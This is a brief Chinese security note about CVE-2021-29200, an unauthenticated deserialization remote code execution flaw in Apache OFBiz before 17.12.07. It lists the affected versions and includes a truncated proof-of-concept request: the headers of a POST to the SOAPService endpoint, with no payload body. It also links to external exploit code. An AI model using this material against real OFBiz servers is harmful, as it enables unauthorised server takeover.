# Apache OFBiz RMI Bypass RCE(CVE-2021-29200)
由于Apache OFBiz存在Java RMI反序列化漏洞,未经身份验证的用户可以执行RCE攻击,导致服务器被接管。
影响版本:
Apache OFBiz < 17.12.07 详细分析可以见:https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw poc: ```
POST /webtools/control/SOAPService HTTP/1.1
Host: xxx
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 877
“`
poc.py:https://github.com/r0ckysec/CVE-2021-29200
ref:
* https://github.com/r0ckysec/CVE-2021-29200
* https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
* https://xz.aliyun.com/t/9556
请登录后查看评论内容